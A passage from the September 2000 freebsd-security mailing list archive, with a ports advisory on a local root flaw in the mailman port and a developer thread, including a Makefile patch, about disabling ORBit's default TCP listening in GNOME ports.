portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOb/kC1UuHi5z0oilAQGUUwQArIH9EegIaatzGdjc9t1g8y7hKEajUTzC Y5qeFxkOKosCMEEVfiZns6mo+nMuQsTwfxgthCnsCqX9PDXXAWrBjDOixmhp5nB3 3ro8UvTiivXIplzncCEbBWZocXCLZWLPV2uoemsr3Py9OZHmCeXKuqsX0OonIHDy r+cAObdg7XA= =YlxZ -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 13 13:37:23 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 7D4D137B6B7; Wed, 13 Sep 2000 13:36:17 -0700 (PDT) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-00:51.mailman Reply-To: security-advisories@freebsd.org Message-Id: <20000913203617.7D4D137B6B7@hub.freebsd.org> Date: Wed, 13 Sep 2000 13:36:17 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:51 Security Advisory FreeBSD, Inc. Topic: mailman port allows local root compromise Category: ports Module: mailman Announced: 2000-09-13 Affects: Ports collection. Corrected: 2000-08-05 Credits: Vendor status: Updated version released. FreeBSD only: NO I. Background Mailman is a mailing list manager. II. Problem Description The mailman port, versions prior to 2.0b5, contained several locally exploitable vulnerabilities which could be used to gain root privileges. The mailman port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains over 3800 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 4.1 and 3.5.1 contain this problem since it was discovered after the releases. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Unprivileged users can obtain root privileges on the local system. If you have not chosen to install the mailman port/package, then your system is not vulnerable to this problem. IV. Workaround Deinstall the mailman port/package, if you have installed it. V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the mailman port. 2) Deinstall the old package and install a new package dated after the correction date, obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/mail/mailman-2.0b5.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/mail/mailman-2.0b5.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/mail/mailman-2.0b5.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/mail/mailman-2.0b5.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/mail/mailman-2.0b5.tgz NOTE: It may be several days before updated packages are available. 3) download a new port skeleton for the listmanager port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOb/kDlUuHi5z0oilAQGvbAQAihAdHJMSq1ZyN71EzJ0FpBmzdgDYEIJ2 keMI1mMfgTgH3gxGnQ9POji6vdw+FxuB2QQuNJvvc8xAsbTLxq18kfeLjlRglc9+ rc23bwT83N5PVdQwJEMyvWugghxvT/3MYhnO3djNnpdep8jPmkAinjJWvVFcb50y kRwD3IJtjUc= =U45z -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 13 19:43:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from whizzo.transsys.com (whizzo.TransSys.COM [144.202.42.10]) by hub.freebsd.org (Postfix) with ESMTP id D3A3937B424; Wed, 13 Sep 2000 19:43:13 -0700 (PDT) Received: from whizzo.transsys.com (localhost.transsys.com [127.0.0.1]) by whizzo.transsys.com (8.11.0/8.11.0) with ESMTP id e8E2hDG42233; Wed, 13 Sep 2000 22:43:13 -0400 (EDT) (envelope-from louie@whizzo.transsys.com) Message-Id: <200009140243.e8E2hDG42233@whizzo.transsys.com> X-Mailer: exmh version 2.1.1 10/15/1999 X-Image-URL: http://www.transsys.com/louie/images/louie-mail.jpg To: security@freebsd.org, ade@freebsd.org From: "Louis A. Mamakos" Subject: potential security exposure in GNOME/ORBit? Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 13 Sep 2000 22:43:13 -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I did a quick search of the FreeBSD security mailing list archives, but didn't see a discussion of this. My apologies if this ground has been covered. I recently installed GNOME on my FreeBSD-current boxes, and noted that a bunch of GNOME applications were listening on random TCP ports. Some investigation eventually revealed that this is intended to be used as a rendezvous mechansim for the ORBit CORBA implemention. Now, this seemed like a strange default configuration, as the usual mode of these interactions on the same machine would appear to be UNIX domain sockets created for this purpose. Some discussion on the one of the GNOME mailing list archives spoke to this; the arguments where one of either: 1. By default, a system out of the box shouldn't be listening on random ports in a way which makes it difficult to secure, or even necessary to have to secure. or 2. Hey, it's not a bug, but a *feature* of ORBit that the CORBA thing work transparently and easily over the network, and not just on the local machine. You can't just "fix" this for GNOME applications without "breaking" other applications that might use ORBit betwen machines. The solution offered was that folks concerned about these ORBit based applications waiting for connections could put ORBIIOPIPv4=0 ORBIIOPIPv6=0 into /usr/local/etc/orbitrc to disable this behavior. I've done this, and the GNOME applications using ORBit continue to work, presumably continuing to use the UNIX domain sockets created for the purpose. So my question is related to what the default state should be when someone installs the FreeBSD GNOME ports? In my own case, I found it surprising to find a bunch of processes (which probably haven't been well audited for security issues) listening on random ports, just waiting for a port scan. As nothing else is using ORBit than these local GNOME applications, I did the "fix" above and no more ports waiting for connections from who knows where. I'd suggest that minimally there be a warning, or perhaps that the orbitrc file be installed to turn off this "feature" when the devel/ORBit port is installed. louie To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 13 22: 5:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id ABE5B37B43C; Wed, 13 Sep 2000 22:05:40 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id WAA52292; Wed, 13 Sep 2000 22:05:40 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Wed, 13 Sep 2000 22:05:40 -0700 (PDT) From: Kris Kennaway To: "Louis A. Mamakos" Cc: security@freebsd.org, ade@freebsd.org Subject: Re: potential security exposure in GNOME/ORBit? In-Reply-To: <200009140243.e8E2hDG42233@whizzo.transsys.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 13 Sep 2000, Louis A. Mamakos wrote: > I'd suggest that minimally there be a warning, or perhaps that the > orbitrc file be installed to turn off this "feature" when the > devel/ORBit port is installed. Unless anyone can think of compelling reasons to have network listening enabled, I'd prefer to have it disabled by default. GNOME scares me :-) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 13 22:39:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from pilikia.net (pilikia.net [12.36.98.183]) by hub.freebsd.org (Postfix) with ESMTP id 8EAE037B423 for ; Wed, 13 Sep 2000 22:39:53 -0700 (PDT) Received: from gecko (gecko [192.168.0.3]) by pilikia.net (8.9.3/8.9.3) with ESMTP id TAA56989 for ; Wed, 13 Sep 2000 19:39:51 -1000 (HST) (envelope-from art@pilikia.net) Message-ID: <200009131939520530.0C9623EE@pilikia.net> X-Mailer: Calypso Version 3.10.03.02 (3) Date: Wed, 13 Sep 2000 19:39:52 -1000 Reply-To: art@pilikia.net From: "Arthur W. Neilson III" To: security@freebsd.org Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org subscribe art@pilikia.net -- __ / ) _/_ It is a capital mistake to theorise before one has data. /--/ __ / Insensibly one begins to twist facts to suit theories, / (_/ (_<__ Instead of theories to suit facts. -- Sherlock Holmes, "A Scandal in Bohemia" Arthur W. Neilson III, WH7N - FISTS #7448 Bank of Hawaii Tech Support http://www.pilikia.net art@pilikia.net, aneilson@boh.com, wh7n@arrl.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 4:50:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id 619A337B423; Thu, 14 Sep 2000 04:50:09 -0700 (PDT) Received: from earth.causticlabs.com (unknown [207.192.76.213]) by pawn.primelocation.net (Postfix) with ESMTP id EC4B59B05; Thu, 14 Sep 2000 07:50:06 -0400 (EDT) Date: Thu, 14 Sep 2000 07:50:05 -0400 (EDT) From: "Chris D. Faulhaber" X-Sender: jedgar@earth.causticlabs.com To: Kris Kennaway Cc: "Louis A. Mamakos" , security@freebsd.org, ade@freebsd.org Subject: Re: potential security exposure in GNOME/ORBit? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 13 Sep 2000, Kris Kennaway wrote: > On Wed, 13 Sep 2000, Louis A. Mamakos wrote: > > > I'd suggest that minimally there be a warning, or perhaps that the > > orbitrc file be installed to turn off this "feature" when the > > devel/ORBit port is installed. > > Unless anyone can think of compelling reasons to have network listening > enabled, I'd prefer to have it disabled by default. > > GNOME scares me :-) > I agree...it gives me the willies too :) ----- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 6:56:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from hub.lovett.com (hub.lovett.com [216.60.121.161]) by hub.freebsd.org (Postfix) with ESMTP id 4A01437B43C; Thu, 14 Sep 2000 06:56:21 -0700 (PDT) Received: from ade by hub.lovett.com with local (Exim 3.16 #1) id 13ZZUy-000Izx-00; Thu, 14 Sep 2000 08:56:20 -0500 Date: Thu, 14 Sep 2000 08:56:20 -0500 From: Ade Lovett To: Kris Kennaway Cc: "Louis A. Mamakos" , security@freebsd.org Subject: Re: potential security exposure in GNOME/ORBit? Message-ID: <20000914085620.K61662@FreeBSD.org> References: <200009140243.e8E2hDG42233@whizzo.transsys.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from kris@FreeBSD.org on Wed, Sep 13, 2000 at 10:05:40PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Sep 13, 2000 at 10:05:40PM -0700, Kris Kennaway wrote: > Unless anyone can think of compelling reasons to have network listening > enabled, I'd prefer to have it disabled by default. I'll kill it off later on this week. Since I have an awful lot of GNOME applications running on this box (some from ports, some just waiting to be ported), I should be able to pick up on any other problems fairly quickly. I also have a tentative fix for the locale problem that was highlighted elsewhere (on -stable I believe). > GNOME scares me :-) Me too. Does that scare you any more? :) -aDe [Mr FreeBSD GNOME] -- Ade Lovett, Austin, TX. ade@FreeBSD.org FreeBSD: The Power to Serve http://www.FreeBSD.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 8:14:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from hub.lovett.com (hub.lovett.com [216.60.121.161]) by hub.freebsd.org (Postfix) with ESMTP id BAA6637B50D; Thu, 14 Sep 2000 08:14:19 -0700 (PDT) Received: from ade by hub.lovett.com with local (Exim 3.16 #1) id 13ZaiP-000J6E-00; Thu, 14 Sep 2000 10:14:17 -0500 Date: Thu, 14 Sep 2000 10:14:17 -0500 From: Ade Lovett To: Kris Kennaway Cc: "Louis A. Mamakos" , security@freebsd.org Subject: Re: potential security exposure in GNOME/ORBit? Message-ID: <20000914101417.A73358@FreeBSD.org> References: <200009140243.e8E2hDG42233@whizzo.transsys.com> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="HlL+5n6rz5pIUxbD" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from kris@FreeBSD.org on Wed, Sep 13, 2000 at 10:05:40PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --HlL+5n6rz5pIUxbD Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Wed, Sep 13, 2000 at 10:05:40PM -0700, Kris Kennaway wrote: > Unless anyone can think of compelling reasons to have network listening > enabled, I'd prefer to have it disabled by default. Please review the following patch.. I'll commit later today unless I hear screams of anguish otherwise (note that there is no etc/orbitrc installed by default, hence the initial overwriting). -aDe -- Ade Lovett, Austin, TX. ade@FreeBSD.org FreeBSD: The Power to Serve http://www.FreeBSD.org/ --HlL+5n6rz5pIUxbD Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="orbit.patch" Index: Makefile =================================================================== RCS file: /home/src/FreeBSD/ports/devel/ORBit/Makefile,v retrieving revision 1.34 diff -u -r1.34 Makefile --- Makefile 2000/08/04 01:15:44 1.34 +++ Makefile 2000/09/14 15:02:59 @@ -7,6 +7,7 @@ PORTNAME= ORBit PORTVERSION= 0.5.3 +PORTREVISION= 1 CATEGORIES= devel gnome MASTER_SITES= ${MASTER_SITE_GNOME} MASTER_SITE_SUBDIR= stable/sources/ORBit @@ -27,5 +28,9 @@ LDFLAGS="-L${LOCALBASE}/lib" CONFIGURE_ARGS= --disable-indent + +post-install: + @${ECHO} "ORBIIOPIPv4=0" > ${PREFIX}/etc/orbitrc + @${ECHO} "ORBIIOPIPv6=0" >> ${PREFIX}/etc/orbitrc .include Index: pkg/PLIST =================================================================== RCS file: /home/src/FreeBSD/ports/devel/ORBit/pkg/PLIST,v retrieving revision 1.10 diff -u -r1.10 PLIST --- pkg/PLIST 2000/06/15 17:12:26 1.10 +++ pkg/PLIST 2000/09/14 15:13:58 @@ -7,6 +7,7 @@ bin/orbit-ird bin/orbit-name-server etc/libIDLConf.sh +etc/orbitrc include/IIOP/IIOP-config.h include/IIOP/IIOP-types.h include/IIOP/IIOP.h --HlL+5n6rz5pIUxbD-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 8:16:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from almen.vxu.se (almen.vxu.se [194.47.99.100]) by hub.freebsd.org (Postfix) with ESMTP id 4657A37B423 for ; Thu, 14 Sep 2000 08:16:12 -0700 (PDT) Received: from XGod (aaldv97.idet.vxu.se [194.47.111.20]) by almen.vxu.se (8.8.8/8.8.7) with SMTP id RAA27017 for ; Thu, 14 Sep 2000 17:16:10 +0200 (MET DST) Message-ID: <003901c01e5e$c1cd4bf0$6400a8c0@XGod> From: "David Andreas Alderud" To: References: <200009140243.e8E2hDG42233@whizzo.transsys.com> <20000914085620.K61662@FreeBSD.org> Subject: Re: potential security exposure in GNOME/ORBit? Date: Thu, 14 Sep 2000 17:16:29 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ade Lovett wrote: > > GNOME scares me :-) > > Me too. Does that scare you any more? :) It ought to scare anyone. Using a non-centralized development model for so much code is like asking for troubble when it comes to bugs and security. Besides, anything that uses resources like they where no end to them doesn't belong in a UNIX-like environment, or anywhere for that matter. /Kind regards, David A. Alderud To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 10: 4:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8F50E37B424; Thu, 14 Sep 2000 10:04:51 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id KAA61241; Thu, 14 Sep 2000 10:04:51 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 14 Sep 2000 10:04:51 -0700 (PDT) From: Kris Kennaway To: Ade Lovett Cc: "Louis A. Mamakos" , security@freebsd.org Subject: Re: potential security exposure in GNOME/ORBit? In-Reply-To: <20000914101417.A73358@FreeBSD.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 14 Sep 2000, Ade Lovett wrote: > Please review the following patch.. I'll commit later today unless > I hear screams of anguish otherwise (note that there is no etc/orbitrc > installed by default, hence the initial overwriting). + +post-install: + @${ECHO} "ORBIIOPIPv4=0" > ${PREFIX}/etc/orbitrc + @${ECHO} "ORBIIOPIPv6=0" >> ${PREFIX}/etc/orbitrc Hmm. Doing it this way will spam any local configuration changes someone may make after installation when they upgrade to a new version..are there any other settings it is likely people may want to set in the orbitrc file? What may be better is to make those settings the default policy, and then install an orbitrc.sample showing how to override them and only remove that file, not orbitrc. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 10: 9:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from hub.lovett.com (hub.lovett.com [216.60.121.161]) by hub.freebsd.org (Postfix) with ESMTP id BA9BC37B423; Thu, 14 Sep 2000 10:09:54 -0700 (PDT) Received: from ade by hub.lovett.com with local (Exim 3.16 #1) id 13ZcWD-000JMs-00; Thu, 14 Sep 2000 12:09:49 -0500 Date: Thu, 14 Sep 2000 12:09:49 -0500 From: Ade Lovett To: Kris Kennaway Cc: "Louis A. Mamakos" , security@freebsd.org Subject: Re: potential security exposure in GNOME/ORBit? Message-ID: <20000914120949.E73990@FreeBSD.org> References: <20000914101417.A73358@FreeBSD.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from kris@FreeBSD.org on Thu, Sep 14, 2000 at 10:04:51AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 14, 2000 at 10:04:51AM -0700, Kris Kennaway wrote: > Hmm. Doing it this way will spam any local configuration changes someone > may make after installation when they upgrade to a new version..are there > any other settings it is likely people may want to set in the orbitrc > file? Well, I have practically every GNOME port installed on my crashbox, and at no time has anything ever been put in etc/orbitrc > What may be better is to make those settings the default policy, and then > install an orbitrc.sample showing how to override them and only remove > that file, not orbitrc. So you'd be happy with installing an orbitrc.sample, followed by a pkg/MESSAGE printout telling them to merge it with any existing orbitrc they might have, otherwise their box could be insecure? -aDe -- Ade Lovett, Austin, TX. ade@FreeBSD.org FreeBSD: The Power to Serve http://www.FreeBSD.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 10:14:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9048A37B424; Thu, 14 Sep 2000 10:14:31 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id KAA64563; Thu, 14 Sep 2000 10:14:31 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 14 Sep 2000 10:14:31 -0700 (PDT) From: Kris Kennaway To: Ade Lovett Cc: "Louis A. Mamakos" , security@freebsd.org Subject: Re: potential security exposure in GNOME/ORBit? In-Reply-To: <20000914120949.E73990@FreeBSD.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 14 Sep 2000, Ade Lovett wrote: > > What may be better is to make those settings the default policy, and then > > install an orbitrc.sample showing how to override them and only remove > > that file, not orbitrc. > > So you'd be happy with installing an orbitrc.sample, followed by > a pkg/MESSAGE printout telling them to merge it with any existing > orbitrc they might have, otherwise their box could be insecure? No, I'd like the binary itself to default to not listening on the network with a way to enable it, and install the sample file telling them how to enable it if they need to. That way the default security isn't compromised and we don't spam anyone who may have local changes in their orbitrc. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 10:23:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from hub.lovett.com (hub.lovett.com [216.60.121.161]) by hub.freebsd.org (Postfix) with ESMTP id 350E937B424; Thu, 14 Sep 2000 10:23:21 -0700 (PDT) Received: from ade by hub.lovett.com with local (Exim 3.16 #1) id 13ZcjI-000JOm-00; Thu, 14 Sep 2000 12:23:20 -0500 Date: Thu, 14 Sep 2000 12:23:20 -0500 From: Ade Lovett To: Kris Kennaway Cc: "Louis A. Mamakos" , security@freebsd.org Subject: Re: potential security exposure in GNOME/ORBit? Message-ID: <20000914122320.G73990@FreeBSD.org> References: <20000914120949.E73990@FreeBSD.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from kris@FreeBSD.org on Thu, Sep 14, 2000 at 10:14:31AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 14, 2000 at 10:14:31AM -0700, Kris Kennaway wrote: > No, I'd like the binary itself to default to not listening on the network > with a way to enable it, and install the sample file telling them how to > enable it if they need to. That way the default security isn't compromised > and we don't spam anyone who may have local changes in their orbitrc. The problem here is that it's not the binary itself that is configured to listen on the network (indeed, the defaults for ipv4 and ipv6 are 0 in the ORBit code itself). The issue is how ORBit is linked to/run by other applications, which may or may not turn on ipv4/ipv6 sockets, with etc/orbitrc and ~/.orbitrc being used for overrides. So, short of looking at every single port that we have that uses ORBit directly, and making appropriate modifications, I can't see how this can be done without potentially hacking a lot of ports, and also auditing new ones as they come in. -aDe -- Ade Lovett, Austin, TX. ade@FreeBSD.org FreeBSD: The Power to Serve http://www.FreeBSD.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 13: 0:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 7755937B423; Thu, 14 Sep 2000 13:00:20 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA71536; Thu, 14 Sep 2000 14:00:15 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id NAA98659; Thu, 14 Sep 2000 13:59:42 -0600 (MDT) Message-Id: <200009141959.NAA98659@harmony.village.org> To: Kris Kennaway Subject: Re: potential security exposure in GNOME/ORBit? Cc: "Louis A. Mamakos" , security@FreeBSD.ORG, ade@FreeBSD.ORG In-reply-to: Your message of "Wed, 13 Sep 2000 22:05:40 PDT." References: Date: Thu, 14 Sep 2000 13:59:42 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Kris Kennaway writes: : GNOME scares me :-) You should take Theo de Raadt out, ply him with beer and then get him started on this topic. The results aren't pretty. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 13: 9: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from hub.lovett.com (hub.lovett.com [216.60.121.161]) by hub.freebsd.org (Postfix) with ESMTP id 7CABF37B43E for ; Thu, 14 Sep 2000 13:08:58 -0700 (PDT) Received: from ade by hub.lovett.com with local (Exim 3.16 #1) id 13ZfJ8-000JiU-00; Thu, 14 Sep 2000 15:08:30 -0500 Date: Thu, 14 Sep 2000 15:08:30 -0500 From: Ade Lovett To: Warner Losh Cc: security@FreeBSD.ORG Subject: Re: potential security exposure in GNOME/ORBit? Message-ID: <20000914150830.E74753@FreeBSD.org> References: <200009141959.NAA98659@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200009141959.NAA98659@harmony.village.org>; from imp@village.org on Thu, Sep 14, 2000 at 01:59:42PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 14, 2000 at 01:59:42PM -0600, Warner Losh wrote: > You should take Theo de Raadt out Now there's an interesting idea.. oh.. wait.. maybe it's not that kind of "take-out".. > The results aren't pretty. From the beer, or the taking-out? Both could be equally messy. -aDe -- Ade Lovett, Austin, TX. ade@FreeBSD.org FreeBSD: The Power to Serve http://www.FreeBSD.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 14:56:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from hub.lovett.com (hub.lovett.com [216.60.121.161]) by hub.freebsd.org (Postfix) with ESMTP id 39C4537B423; Thu, 14 Sep 2000 14:56:16 -0700 (PDT) Received: from ade by hub.lovett.com with local (Exim 3.16 #1) id 13ZgzN-000JwE-00; Thu, 14 Sep 2000 16:56:13 -0500 Date: Thu, 14 Sep 2000 16:56:13 -0500 From: Ade Lovett To: Kris Kennaway Cc: security@freebsd.org Subject: Re: potential security exposure in GNOME/ORBit? Message-ID: <20000914165613.J74753@lovett.com> References: <20000914120949.E73990@FreeBSD.org> <20000914122320.G73990@FreeBSD.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20000914122320.G73990@FreeBSD.org>; from ade@FreeBSD.org on Thu, Sep 14, 2000 at 12:23:20PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 14, 2000 at 12:23:20PM -0500, Ade Lovett wrote: > So, short of looking at every single port that we have that uses > ORBit directly, and making appropriate modifications, I can't see > how this can be done without potentially hacking a lot of ports, > and also auditing new ones as they come in. Unless I hear to the contrary (ie: someone comes up with a better solution + patches) by 0900 CDT tomorrow 9/15, I'm going to commit my original patch, modulo that it will install etc/orbitrc.sample and use a pkg/MESSAGE suggesting that they move it in place for security reasons. There is obviously a security issue here, and it behooves us to at least put in the quick-fix, even if it is backed out and replaced with "the right way" at some later date, perhaps in a newer version. One thing that would be useful is for interested parties to bring up a suite of ORBit applications that are listening on these high-numbered ports, and then hunt for an exploit. If we can get that, we're already covered (by the quick-hack) and it'll provide a kick in the pants for a proper fix from the people that understand the code the best -- the authors (I hope :) -aDe -- Ade Lovett, Austin, TX. ade@FreeBSD.org FreeBSD: The Power to Serve http://www.FreeBSD.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 17:13:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) 